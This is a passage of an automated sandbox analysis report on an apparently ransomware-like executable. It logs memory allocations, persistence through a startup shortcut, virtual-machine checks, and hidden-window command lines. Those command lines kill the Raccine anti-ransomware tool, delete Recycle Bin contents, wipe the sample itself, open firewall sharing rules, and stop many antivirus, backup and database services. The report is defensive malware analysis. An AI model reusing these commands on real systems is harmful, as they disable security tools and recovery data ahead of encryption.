NtAllocateVirtualMemory March 24, 2021, 10:06 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2021, 10:06 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2021, 10:06 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef58000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2021, 10:06 a.m.	process_identifier: 1836 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2021, 10:06 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2021, 10:06 a.m.	process_identifier: 1836 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00bdb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2021, 10:06 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0053a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2021, 10:06 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00bdd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2021, 10:06 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0052c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2021, 10:06 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00bde000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2021, 10:06 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00bdf000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2021, 10:06 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05d00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2021, 10:06 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05d01000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2021, 10:06 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05d02000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2021, 10:06 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05d03000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory March 24, 2021, 10:07 a.m.	process_identifier: 10540 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73772000 process_handle: 0xffffffff	1

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (2 events)

Time & API	Arguments	Status	Return	Repeated
GetDiskFreeSpaceExW March 24, 2021, 9:59 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 13294206976 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Explorer total_number_of_bytes: 0	1	1	0
GetDiskFreeSpaceExW March 24, 2021, 9:59 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 13293576192 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Explorer total_number_of_bytes: 0	1	1	0

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk

Creates a shortcut to an executable file (50 out of 102 events)

file	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\한글과컴퓨터\한컴 자동 업데이트.lnk
file	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Microsoft Office\Microsoft Office 도구\VBA 프로젝트용 디지털 인증서.lnk
file	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Python 2.7\Uninstall Python.lnk
file	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Microsoft Office\Microsoft Office Groove 2007.lnk
file	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\HttpWatch Professional Edition\HttpWatch Help.lnk
file	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Task Scheduler.lnk
file	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Sync Center.lnk
file	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\HttpWatch Professional Edition\HttpWatch Studio.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\System Configuration.lnk
file	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Windows PowerShell Modules.lnk
file	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Component Services.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk
file	C:\Users\test22\Links\Desktop.lnk
file	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Chrome.lnk
file	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\한글과컴퓨터\한컴오피스 한글 2010\한컴 사전.lnk
file	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Windows Anytime Upgrade.lnk
file	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Paint.lnk
file	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\한글과컴퓨터\한컴오피스 한글 2010\한컴 타자연습.lnk
file	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Welcome Center.lnk
file	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Disk Cleanup.lnk
file	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Maintenance\Backup and Restore Center.lnk
file	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\7-Zip\7-Zip Help.lnk
file	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Java\Get Help.lnk
file	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Java\Check For Updates.lnk
file	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
file	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Remote Desktop Connection.lnk
file	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\7-Zip\7-Zip File Manager.lnk
file	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\한글과컴퓨터\한컴오피스 한글 2010\한컴오피스 한글 2010.lnk
file	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell ISE.lnk
file	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\System Configuration.lnk
file	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Microsoft Office\Microsoft Office Publisher 2007.lnk
file	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\한글과컴퓨터\한컴오피스 한글 2010\한컴 문서찾기.lnk
file	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\ShapeCollector.lnk
file	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Microsoft Office\Microsoft Office Excel 2007.lnk
file	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Sound Recorder.lnk
file	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Microsoft Office\Microsoft Office 도구\Microsoft Office 2007 언어 설정.lnk
file	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Security Configuration Management.lnk
file	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\한글과컴퓨터\한컴오피스 한글 2010\한컴 기본 설정.lnk
file	C:\Users\All Users\Microsoft\Windows\Start Menu\Default Programs.lnk
file	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\displayswitch.lnk
file	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\iSCSI Initiator.lnk
file	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Math Input Panel.lnk
file	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Data Sources (ODBC).lnk
file	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Python 2.7\IDLE (Python GUI).lnk
file	C:\Users\All Users\Microsoft\Windows\Start Menu\한컴 사전.lnk
file	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\HttpWatch Professional Edition\Automation Examples.lnk
file	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Mobility Center.lnk
file	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Windows Easy Transfer.lnk
file	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\Windows Journal.lnk
file	C:\Users\test22\Links\Downloads.lnk

Creates a suspicious process (6 events)

cmdline	"schtasks" /DELETE /TN "Raccine Rules Updater" /F
cmdline	"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\test22\AppData\Local\Temp\Client-0.exe
cmdline	"cmd.exe" /c rd /s /q D:\\$Recycle.bin
cmdline	"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
cmdline	"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
cmdline	cmd.exe "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\test22\AppData\Local\Temp\Client-0.exe

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\Temp\Client-0.exe

Executes one or more WMI queries (1 event)

wmi	SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "RaccineSettings.exe")

A process created a hidden window (50 out of 245 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW March 24, 2021, 10:06 a.m.	thread_identifier: 8088 thread_handle: 0x00000300 process_identifier: 5540 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "taskkill" /F /IM RaccineSettings.exe filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x0000030c	1	1
CreateProcessInternalW March 24, 2021, 10:06 a.m.	thread_identifier: 6692 thread_handle: 0x00000300 process_identifier: 8324 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000310	1	1
CreateProcessInternalW March 24, 2021, 10:06 a.m.	thread_identifier: 3800 thread_handle: 0x00000300 process_identifier: 8752 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "reg" delete HKCU\Software\Raccine /F filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000318	1	1
CreateProcessInternalW March 24, 2021, 10:06 a.m.	thread_identifier: 3752 thread_handle: 0x00000300 process_identifier: 4980 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "schtasks" /DELETE /TN "Raccine Rules Updater" /F filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000320	1	1
CreateProcessInternalW March 24, 2021, 10:06 a.m.	thread_identifier: 8104 thread_handle: 0x0000033c process_identifier: 5332 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000348	1	1
CreateProcessInternalW March 24, 2021, 10:06 a.m.	thread_identifier: 6420 thread_handle: 0x0000033c process_identifier: 2120 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "cmd.exe" /c rd /s /q D:\\$Recycle.bin filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x0000034c	1	1
CreateProcessInternalW March 24, 2021, 10:06 a.m.	thread_identifier: 5960 thread_handle: 0x0000033c process_identifier: 4220 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "sc.exe" config Dnscache start= auto filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x0000039c	1	1
CreateProcessInternalW March 24, 2021, 10:06 a.m.	thread_identifier: 9024 thread_handle: 0x0000033c process_identifier: 3724 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "sc.exe" config SQLTELEMETRY start= disabled filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000003a0	1	1
CreateProcessInternalW March 24, 2021, 10:06 a.m.	thread_identifier: 7552 thread_handle: 0x0000033c process_identifier: 4404 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "sc.exe" config FDResPub start= auto filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000003a8	1	1
CreateProcessInternalW March 24, 2021, 10:06 a.m.	thread_identifier: 2508 thread_handle: 0x0000033c process_identifier: 6980 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000003b0	1	1
CreateProcessInternalW March 24, 2021, 10:06 a.m.	thread_identifier: 8636 thread_handle: 0x0000033c process_identifier: 7912 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "sc.exe" config SSDPSRV start= auto filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000003b8	1	1
CreateProcessInternalW March 24, 2021, 10:06 a.m.	thread_identifier: 3980 thread_handle: 0x00000340 process_identifier: 3456 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000003c0	1	1
CreateProcessInternalW March 24, 2021, 10:06 a.m.	thread_identifier: 6552 thread_handle: 0x00000340 process_identifier: 7884 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "sc.exe" config SstpSvc start= disabled filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000003c8	1	1
CreateProcessInternalW March 24, 2021, 10:06 a.m.	thread_identifier: 3064 thread_handle: 0x00000340 process_identifier: 8496 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000003d0	1	1
CreateProcessInternalW March 24, 2021, 10:06 a.m.	thread_identifier: 4168 thread_handle: 0x00000340 process_identifier: 7804 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "sc.exe" config upnphost start= auto filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000003dc	1	1
CreateProcessInternalW March 24, 2021, 10:06 a.m.	thread_identifier: 5328 thread_handle: 0x00000340 process_identifier: 8156 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "sc.exe" config SQLWriter start= disabled filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000003ec	1	1
CreateProcessInternalW March 24, 2021, 10:06 a.m.	thread_identifier: 7096 thread_handle: 0x00000404 process_identifier: 7276 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "net.exe" start Dnscache /y filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000408	1	1
CreateProcessInternalW March 24, 2021, 10:06 a.m.	thread_identifier: 1616 thread_handle: 0x0000042c process_identifier: 5512 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "net.exe" stop bedbg /y filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000448	1	1
CreateProcessInternalW March 24, 2021, 10:06 a.m.	thread_identifier: 7824 thread_handle: 0x0000045c process_identifier: 7280 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "net.exe" start FDResPub /y filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000494	1	1
CreateProcessInternalW March 24, 2021, 10:06 a.m.	thread_identifier: 5012 thread_handle: 0x0000045c process_identifier: 7588 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "net.exe" start SSDPSRV /y filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000004c8	1	1
CreateProcessInternalW March 24, 2021, 10:06 a.m.	thread_identifier: 1912 thread_handle: 0x0000045c process_identifier: 7160 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "net.exe" stop MSSQL$SQL_2008 /y filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000004cc	1	1
CreateProcessInternalW March 24, 2021, 10:06 a.m.	thread_identifier: 8968 thread_handle: 0x0000045c process_identifier: 3356 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "net.exe" stop avpsus /y filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000004fc	1	1
CreateProcessInternalW March 24, 2021, 10:06 a.m.	thread_identifier: 5996 thread_handle: 0x000004d4 process_identifier: 3024 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "net.exe" stop MMS /y filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000504	1	1
CreateProcessInternalW March 24, 2021, 10:06 a.m.	thread_identifier: 6448 thread_handle: 0x00000500 process_identifier: 6752 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "net.exe" start upnphost /y filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000508	1	1
CreateProcessInternalW March 24, 2021, 10:06 a.m.	thread_identifier: 8836 thread_handle: 0x00000500 process_identifier: 6620 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "net.exe" stop McAfeeDLPAgentService /y filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x0000056c	1	1
CreateProcessInternalW March 24, 2021, 10:06 a.m.	thread_identifier: 2764 thread_handle: 0x00000574 process_identifier: 5924 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "net.exe" stop MSSQL$SQLEXPRESS /y filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000570	1	1
CreateProcessInternalW March 24, 2021, 10:06 a.m.	thread_identifier: 6816 thread_handle: 0x00000574 process_identifier: 3036 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "net.exe" stop EhttpSrv /y filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000578	1	1
CreateProcessInternalW March 24, 2021, 10:06 a.m.	thread_identifier: 7612 thread_handle: 0x00000574 process_identifier: 4308 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "net.exe" stop mfewc /y filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000580	1	1
CreateProcessInternalW March 24, 2021, 10:06 a.m.	thread_identifier: 4124 thread_handle: 0x00000574 process_identifier: 7856 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "net.exe" stop ccEvtMgr /y filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000584	1	1
CreateProcessInternalW March 24, 2021, 10:06 a.m.	thread_identifier: 7396 thread_handle: 0x00000574 process_identifier: 6736 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "net.exe" stop ekrn /y filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x0000058c	1	1
CreateProcessInternalW March 24, 2021, 10:06 a.m.	thread_identifier: 6276 thread_handle: 0x00000574 process_identifier: 2036 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "net.exe" stop mozyprobackup /y filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000594	1	1
CreateProcessInternalW March 24, 2021, 10:06 a.m.	thread_identifier: 3440 thread_handle: 0x00000574 process_identifier: 5316 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "net.exe" stop BMR Boot Service /y filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000340	1	1
CreateProcessInternalW March 24, 2021, 10:06 a.m.	thread_identifier: 4140 thread_handle: 0x00000574 process_identifier: 7760 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "net.exe" stop ccSetMgr /y filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000580	1	1
CreateProcessInternalW March 24, 2021, 10:06 a.m.	thread_identifier: 8608 thread_handle: 0x00000574 process_identifier: 1772 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "net.exe" stop MSSQL$TPS /y filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000594	1	1
CreateProcessInternalW March 24, 2021, 10:06 a.m.	thread_identifier: 3428 thread_handle: 0x00000574 process_identifier: 5092 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "net.exe" stop MSSQL$SYSTEM_BGC /y filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x0000056c	1	1
CreateProcessInternalW March 24, 2021, 10:06 a.m.	thread_identifier: 7260 thread_handle: 0x00000574 process_identifier: 5792 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "net.exe" stop NetBackup BMR MTFTP Service /y filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000005a0	1	1
CreateProcessInternalW March 24, 2021, 10:06 a.m.	thread_identifier: 4036 thread_handle: 0x00000574 process_identifier: 5544 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "net.exe" stop SavRoam /y filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000003b0	1	1
CreateProcessInternalW March 24, 2021, 10:06 a.m.	thread_identifier: 5336 thread_handle: 0x00000574 process_identifier: 3772 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "net.exe" stop EPUpdateService /y filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000348	1	1
CreateProcessInternalW March 24, 2021, 10:06 a.m.	thread_identifier: 6924 thread_handle: 0x00000574 process_identifier: 4188 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "net.exe" stop EPSecurityService /y filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000004fc	1	1
CreateProcessInternalW March 24, 2021, 10:06 a.m.	thread_identifier: 3524 thread_handle: 0x000004fc process_identifier: 2996 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "net.exe" stop DefWatch /y filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000574	1	1
CreateProcessInternalW March 24, 2021, 10:06 a.m.	thread_identifier: 5744 thread_handle: 0x000004fc process_identifier: 5140 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "net.exe" stop RTVscan /y filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000500	1	1
CreateProcessInternalW March 24, 2021, 10:06 a.m.	thread_identifier: 5188 thread_handle: 0x00000500 process_identifier: 4324 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "net.exe" stop ntrtscan /y filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000004fc	1	1
CreateProcessInternalW March 24, 2021, 10:06 a.m.	thread_identifier: 4088 thread_handle: 0x00000500 process_identifier: 6112 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "net.exe" stop MSSQL$VEEAMSQL2008R2 /y filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000003b0	1	1
CreateProcessInternalW March 24, 2021, 10:06 a.m.	thread_identifier: 6700 thread_handle: 0x00000348 process_identifier: 1188 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "net.exe" stop QBFCService /y filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000594	1	1
CreateProcessInternalW March 24, 2021, 10:06 a.m.	thread_identifier: 4968 thread_handle: 0x00000348 process_identifier: 3756 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "net.exe" stop VSNAPVSS /y filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000003d0	1	1
CreateProcessInternalW March 24, 2021, 10:06 a.m.	thread_identifier: 6560 thread_handle: 0x00000348 process_identifier: 5384 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "net.exe" stop MSSQL$TPSAMA /y filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000003b0	1	1
